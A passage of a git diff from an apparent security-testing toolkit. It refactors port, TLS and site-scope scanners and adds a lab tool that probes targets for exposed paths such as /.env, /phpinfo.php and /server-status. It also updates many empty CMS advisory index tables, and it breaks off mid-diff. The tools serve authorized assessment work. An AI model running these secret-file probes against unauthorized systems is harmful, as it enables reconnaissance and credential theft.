06f60bc7..532343b9 100755 --- a/04-server-security/infrastructure/tools/site-scope-mapper.py +++ b/04-server-security/infrastructure/tools/site-scope-mapper.py @@ -30,13 +30,22 @@ import socket import ssl import warnings from dataclasses import asdict, dataclass, field +from pathlib import Path from typing import Dict, List, Optional, Set +import sys warnings.filterwarnings("ignore", message="urllib3 v2 only supports OpenSSL") import requests +SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import add_common_args, emit_report, make_report, write_evidence # noqa: E402 + + DEFAULT_PORTS = [80, 443, 8080, 8443] @@ -226,6 +235,7 @@ def main() -> int: action="store_true", help="确认目标属于自有资产或已明确授权", ) + add_common_args(parser, include_network=False) args = parser.parse_args() if not args.ack_authorized: @@ -267,11 +277,25 @@ def main() -> int: "related_hosts": sorted(related_hosts), } - if args.json: - print(json.dumps(report, indent=2, ensure_ascii=True)) - else: - print(render_text(report)) - return 0 + evidence_refs = [] + ref = write_evidence(args, "site-scope-map.json", report) + if ref: + evidence_refs.append(ref) + payload = make_report( + tool="site-scope-mapper", + mode="single-target-scope-map", + target=args.target, + status="verified" if report["http"] or report["tls"] else "needs-review", + severity="low", + payload_or_probe=report, + request_summary={"ports": ports, "target_type": target_type}, + evidence_refs=evidence_refs, + destructive_risk="low", + args=args, + ) + if args.json and args.format == "text": + args.format = "json" + return emit_report(args, payload, render_text(report).splitlines()) if __name__ == "__main__": diff --git a/04-server-security/misconfiguration/tools/misconfig-lab.py b/04-server-security/misconfiguration/tools/misconfig-lab.py new file mode 100644 index 00000000..d475ae73 --- /dev/null +++ b/04-server-security/misconfiguration/tools/misconfig-lab.py @@ -0,0 +1,96 @@ +#!/usr/bin/env python3 +""" +Misconfiguration Lab Tool + +LAB ONLY | AUTHORIZED TARGETS ONLY +""" + +from __future__ import annotations + +import argparse +import sys +from pathlib import Path +from typing import Any, Dict, List +from urllib.parse import urljoin + +import requests + +SCRIPTS_DIR = Path(__file__).resolve().parents[3] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, parse_headers, write_evidence # noqa: E402 + + +DEFAULT_PATHS = [ + "/.env", + "/server-status", + "/actuator/health", + "/swagger-ui.html", + "/phpinfo.php", + "/admin/", + "/debug", +] + + +def probe(target: str, timeout: float, headers: Dict[str, str]) -> List[Dict[str, Any]]: + results = [] + for path in DEFAULT_PATHS: + url = urljoin(target if target.endswith("/") else target + "/", path.lstrip("/")) + try: + response = requests.get(url, timeout=timeout, headers=headers, verify=False) + results.append( + { + "path": path, + "url": url, + "status_code": response.status_code, + "server": response.headers.get("Server"), + "content_type": response.headers.get("Content-Type"), + "body_excerpt": response.text[:300], + } + ) + except Exception as exc: + results.append({"path": path, "url": url, "error": str(exc)}) + return results + + +def main() -> int: + parser = argparse.ArgumentParser(description="Misconfiguration Lab Tool") + parser.add_argument("--target", required=True, help="目标 URL") + parser.add_argument("--timeout", type=float, default=8.0, help="请求超时时间") + add_common_args(parser) + args = parser.parse_args() + ensure_authorized(args, parser) + + headers = parse_headers(args.header) + results = probe(args.target, args.timeout, headers) + evidence_refs = [] + ref = write_evidence(args, "misconfig-lab.json", {"results": results}) + if ref: + evidence_refs.append(ref) + suspicious = [item for item in results if item.get("status_code") in {200, 401, 403}] + report = make_report( + tool="misconfig-lab", + mode="misconfiguration-surface-check", + target=args.target, + status="verified" if suspicious else "needs-review", + severity="medium" if suspicious else "info", + payload_or_probe={"results": results, "suspicious": suspicious}, + request_summary={"timeout": args.timeout, "paths": DEFAULT_PATHS}, + evidence_refs=evidence_refs, + destructive_risk="low", + args=args, + ) + text_lines = [ + "=" * 60, + "Misconfiguration Lab Tool", + "=" * 60, + f"Target: {args.target}", + f"Paths Checked: {len(DEFAULT_PATHS)}", + f"Suspicious Responses: {len(suspicious)}", + ] + return emit_report(args, report, text_lines) + + +if __name__ == "__main__": + raise SystemExit(main()) diff --git a/04-server-security/scanning/tools/port-scanner.py b/04-server-security/scanning/tools/port-scanner.py index bedea7a3..6302768a 100644 --- a/04-server-security/scanning/tools/port-scanner.py +++ b/04-server-security/scanning/tools/port-scanner.py @@ -27,6 +27,14 @@ import time from concurrent.futures import ThreadPoolExecutor, as_completed from typing import List, Dict, Tuple, Optional import sys +from pathlib import Path + + +SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402 class Colors: @@ -229,37 +237,54 @@ def main(): parser.add_argument("-t", "--threads", type=int, default=100, help="线程数") parser.add_argument("--timeout", type=float, default=1.0, help="超时时间") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") + add_common_args(parser, include_network=False) args = parser.parse_args() + ensure_authorized(args, parser) scanner = PortScanner(threads=args.threads, timeout=args.timeout) + if args.format != "text": + scanner.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment] if args.top_ports: ports = scanner.top_ports[: args.top_ports] else: ports = scanner.parse_ports(args.ports) - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - print(f"{Colors.BOLD}Port Scanner{Colors.END}") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") - scanner.print_result("INFO", f"目标: {args.host}") scanner.print_result("INFO", f"端口: {len(ports)} 个") scanner.print_result("INFO", f"线程: {args.threads}") results = scanner.scan_host(args.host, ports, args.verbose) - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - if results: - scanner.print_result("SUCCESS", f"发现 {len(results)} 个开放端口:") - print(f"\n{'PORT':<10} {'SERVICE':<15} {'BANNER'}") - print("-" * 60) - for r in sorted(results, key=lambda x: x["port"]): - banner = r["banner"][:40] if r["banner"] else r["service"] - print(f"{r['port']:<10} {r['service']:<15} {banner}") - else: - scanner.print_result("INFO", "未发现开放端口") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") + evidence_refs = [] + ref = write_evidence(args, "port-scan-results.json", {"results": results, "ports": ports}) + if ref: + evidence_refs.append(ref) + status = "verified" if results else "needs-review" + severity = "medium" if results else "info" + report = make_report( + tool="port-scanner", + mode="minimal-port-scan", + target=args.host, + status=status, + severity=severity, + payload_or_probe={"ports": ports, "open_ports": results}, + request_summary={"threads": args.threads, "timeout": args.timeout}, + evidence_refs=evidence_refs, + destructive_risk="low", + args=args, + ) + text_lines = [ + "=" * 60, + "Port Scanner", + "=" * 60, + f"Target: {args.host}", + f"Ports Checked: {len(ports)}", + f"Open Ports: {len(results)}", + f"Status: {status}", + ] + emit_report(args, report, text_lines) if __name__ == "__main__": diff --git a/04-server-security/tls/tools/tls-scanner.py b/04-server-security/tls/tools/tls-scanner.py index d5e02d60..67580326 100644 --- a/04-server-security/tls/tools/tls-scanner.py +++ b/04-server-security/tls/tools/tls-scanner.py @@ -26,6 +26,14 @@ import re from typing import Dict, List, Tuple, Optional from datetime import datetime import sys +from pathlib import Path + + +SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402 class Colors: @@ -271,74 +279,45 @@ def main(): parser.add_argument("-u", "--url", required=True, help="目标 URL 或主机名") parser.add_argument("-p", "--port", type=int, default=443, help="端口 (默认: 443)") parser.add_argument("--timeout", type=int, default=10, help="超时时间") + add_common_args(parser, include_network=False) args = parser.parse_args() + ensure_authorized(args, parser) hostname = args.url.replace("https://", "").replace("http://", "").split("/")[0] scanner = TLSScanner(timeout=args.timeout) - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - print(f"{Colors.BOLD}TLS Scanner{Colors.END}") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") - scanner.print_result("INFO", f"目标: {hostname}:{args.port}") - - print(f"\n{Colors.CYAN}[*] 扫描协议支持...{Colors.END}") results = scanner.scan(hostname, args.port) - - print(f"\n{Colors.CYAN}协议支持:{Colors.END}") - for proto, supported in results["protocols"].items(): - status = ( - f"{Colors.GREEN}支持{Colors.END}" - if supported - else f"{Colors.RED}不支持{Colors.END}" - ) - if supported and proto in ["SSLv2", "SSLv3"]: - status = f"{Colors.RED}支持 (不安全){Colors.END}" - elif supported and proto in ["TLSv1.0", "TLSv1.1"]: - status = f"{Colors.YELLOW}支持 (过时){Colors.END}" - print(f" {proto:<10} {status}") - - if results["cipher"]: - print(f"\n{Colors.CYAN}当前密码套件:{Colors.END}") - cipher_name, cipher_proto, cipher_bits = results["cipher"] - print(f" 名称: {cipher_name}") - print(f" 协议: {cipher_proto}") - print(f" 密钥长度: {cipher_bits} bits") - - if results["certificate"]: - print(f"\n{Colors.CYAN}证书信息:{Colors.END}") - cert = results["certificate"] - print(f" 主题: {cert['subject'].get('commonName', 'N/A')}") - print(f" 颁发者: {cert['issuer'].get('commonName', 'N/A')}") - print(f" 有效期: {cert['not_before']} - {cert['not_after']}") - - print(f"\n{Colors.CYAN}HSTS:{Colors.END}") - if results["hsts"]["enabled"]: - print(f" 状态: {Colors.GREEN}已启用{Colors.END}") - print(f" Max-Age: {results['hsts']['max_age']} 秒") - print( - f" IncludeSubDomains: {'是' if results['hsts']['include_subdomains'] else '否'}" - ) - print(f" Preload: {'是' if results['hsts']['preload'] else '否'}") - else: - print(f" 状态: {Colors.RED}未启用{Colors.END}") - - print(f"\n{Colors.CYAN}安全问题:{Colors.END}") - if results["issues"]: - for issue in sorted(results["issues"], key=lambda x: x["severity"]): - color = ( - Colors.RED - if issue["severity"] in ["CRITICAL", "HIGH"] - else Colors.YELLOW - ) - print(f" {color}[{issue['severity']}]{Colors.END} {issue['issue']}") - print(f" 建议: {issue['recommendation']}") - else: - print(f" {Colors.GREEN}未发现安全问题{Colors.END}") - - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n") + evidence_refs = [] + ref = write_evidence(args, "tls-results.json", results) + if ref: + evidence_refs.append(ref) + severity = "high" if any(issue["severity"] in ["CRITICAL", "HIGH"] for issue in results["issues"]) else "medium" if results["issues"] else "info" + status = "verified" if results["issues"] else "needs-review" + report = make_report( + tool="tls-scanner", + mode="tls-readonly-check", + target=f"{hostname}:{args.port}", + status=status, + severity=severity, + payload_or_probe={"issues": results["issues"], "protocols": results["protocols"], "hsts": results["hsts"]}, + request_summary={"timeout": args.timeout, "certificate_present": bool(results["certificate"])}, + evidence_refs=evidence_refs, + destructive_risk="low", + args=args, + ) + text_lines = [ + "=" * 60, + "TLS Scanner", + "=" * 60, + f"Target: {hostname}:{args.port}", + f"Issues: {len(results['issues'])}", + f"HSTS Enabled: {'yes' if results['hsts']['enabled'] else 'no'}", + f"Status: {status}", + ] + emit_report(args, report, text_lines) if __name__ == "__main__": diff --git a/07-framework-security/cms/directus/INDEX.md b/07-framework-security/cms/directus/INDEX.md index a1e904a9..f8b65ee9 100644 --- a/07-framework-security/cms/directus/INDEX.md +++ b/07-framework-security/cms/directus/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/cms/discourse/INDEX.md b/07-framework-security/cms/discourse/INDEX.md index 3b57918d..d86c5387 100644 --- a/07-framework-security/cms/discourse/INDEX.md +++ b/07-framework-security/cms/discourse/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/cms/drupal/INDEX.md b/07-framework-security/cms/drupal/INDEX.md index 513a8bd5..f08b6ee2 100644 --- a/07-framework-security/cms/drupal/INDEX.md +++ b/07-framework-security/cms/drupal/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/cms/ghost/INDEX.md b/07-framework-security/cms/ghost/INDEX.md index 16f23901..b672c46a 100644 --- a/07-framework-security/cms/ghost/INDEX.md +++ b/07-framework-security/cms/ghost/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/cms/joomla/INDEX.md b/07-framework-security/cms/joomla/INDEX.md index 056cd1ab..25050419 100644 --- a/07-framework-security/cms/joomla/INDEX.md +++ b/07-framework-security/cms/joomla/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/cms/mediawiki/INDEX.md b/07-framework-security/cms/mediawiki/INDEX.md index b56b6ac3..6e62172c 100644 --- a/07-framework-security/cms/mediawiki/INDEX.md +++ b/07-framework-security/cms/mediawiki/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/cms/moodle/INDEX.md b/07-framework-security/cms/moodle/INDEX.md index 18d2295a..ddf76cae 100644 --- a/07-framework-security/cms/moodle/INDEX.md +++ b/07-framework-security/cms/moodle/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/cms/strapi/INDEX.md b/07-framework-security/cms/strapi/INDEX.md index bb38077a..70c31e85 100644 --- a/07-framework-security/cms/strapi/INDEX.md +++ b/07-framework-security/cms/strapi/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/cms/wordpress/INDEX.md b/07-framework-security/cms/wordpress/INDEX.md index 60d3c14d..07c63c40 100644 --- a/07-framework-security/cms/wordpress/INDEX.md +++ b/07-framework-security/cms/wordpress/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -29,6 +33,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/ecommerce/adobe-commerce/INDEX.md b/07-framework-security/ecommerce/adobe-commerce/INDEX.md index e8f7a870..5685ff5d 100644 --- a/07-framework-security/ecommerce/adobe-commerce/INDEX.md +++ b/07-framework-security/ecommerce/adobe-commerce/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/ecommerce/magento-open-source/INDEX.md b/07-framework-security/ecommerce/magento-open-source/INDEX.md index 35fa2ca5..97f5ae93 100644 --- a/07-framework-security/ecommerce/magento-open-source/INDEX.md +++ b/07-framework-security/ecommerce/magento-open-source/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/ecommerce/medusa/INDEX.md b/07-framework-security/ecommerce/medusa/INDEX.md index 1bf10ed9..979f92f5 100644 --- a/07-framework-security/ecommerce/medusa/INDEX.md +++ b/07-framework-security/ecommerce/medusa/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/ecommerce/opencart/INDEX.md b/07-framework-security/ecommerce/opencart/INDEX.md index c10a4d51..68c578fc 100644 --- a/07-framework-security/ecommerce/opencart/INDEX.md +++ b/07-framework-security/ecommerce/opencart/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/ecommerce/openmage/INDEX.md b/07-framework-security/ecommerce/openmage/INDEX.md index 66d4d3c7..c5232e4d 100644 --- a/07-framework-security/ecommerce/openmage/INDEX.md +++ b/07-framework-security/ecommerce/openmage/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/ecommerce/prestashop/INDEX.md b/07-framework-security/ecommerce/prestashop/INDEX.md index 7754fa2e..3396db6a 100644 --- a/07-framework-security/ecommerce/prestashop/INDEX.md +++ b/07-framework-security/ecommerce/prestashop/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/ecommerce/saleor/INDEX.md b/07-framework-security/ecommerce/saleor/INDEX.md index 3c84f411..1d6727c7 100644 --- a/07-framework-security/ecommerce/saleor/INDEX.md +++ b/07-framework-security/ecommerce/saleor/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/ecommerce/shopware/INDEX.md b/07-framework-security/ecommerce/shopware/INDEX.md index 986c776e..14c0dbcf 100644 --- a/07-framework-security/ecommerce/shopware/INDEX.md +++ b/07-framework-security/ecommerce/shopware/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/ecommerce/woocommerce/INDEX.md b/07-framework-security/ecommerce/woocommerce/INDEX.md index 6d1bc73a..74e340ca 100644 --- 